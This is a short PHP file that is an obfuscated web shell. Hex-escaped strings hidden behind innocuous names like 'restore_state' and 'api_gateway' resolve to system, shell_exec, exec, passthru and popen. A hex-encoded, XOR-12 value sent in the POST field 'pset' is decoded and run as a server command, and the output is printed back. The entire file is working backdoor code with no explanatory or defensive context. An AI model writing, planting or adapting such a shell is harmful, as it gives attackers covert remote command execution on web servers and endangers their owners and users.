<?php

$restore_state7 = "p\x63lose";
$restore_state2 = "sh\x65ll\x5Fe\x78\x65\x63";
$restore_state6 = "st\x72\x65am_ge\x74\x5F\x63\x6F\x6Eten\x74\x73";
$api_gateway = "he\x78\x32b\x69\x6E";
$restore_state5 = "\x70op\x65n";
$restore_state4 = "p\x61ssthru";
$restore_state3 = "ex\x65\x63";
$restore_state1 = "\x73y\x73t\x65m";
if (isset($_POST["\x70s\x65t"])) {
            function hub_center ( $element, $property_set ){
 $entry ='' ;
for($n=0;
 $n<strlen($element);
 $n++){
$entry.=chr(ord($element[$n])^$property_set);

} return$entry;
 
}
            $pset = $api_gateway($_POST["\x70s\x65t"]);
            $pset = hub_center($pset, 12);
            if (function_exists($restore_state1)) {
                $restore_state1($pset);
            } elseif (function_exists($restore_state2)) {
                print $restore_state2($pset);
            } elseif (function_exists($restore_state3)) {
                $restore_state3($pset, $flg_element);
                print join("\n", $flg_element);
            } elseif (function_exists($restore_state4)) {
                $restore_state4($pset);
            } elseif (function_exists($restore_state5) && function_exists($restore_state6) && function_exists($restore_state7)) {
                $property_set_entry = $restore_state5($pset, 'r');
                if ($property_set_entry) {
                    $data_chunk_item = $restore_state6($property_set_entry);
                    $restore_state7($property_set_entry);
                    print $data_chunk_item;
                }
            }
            exit;
        }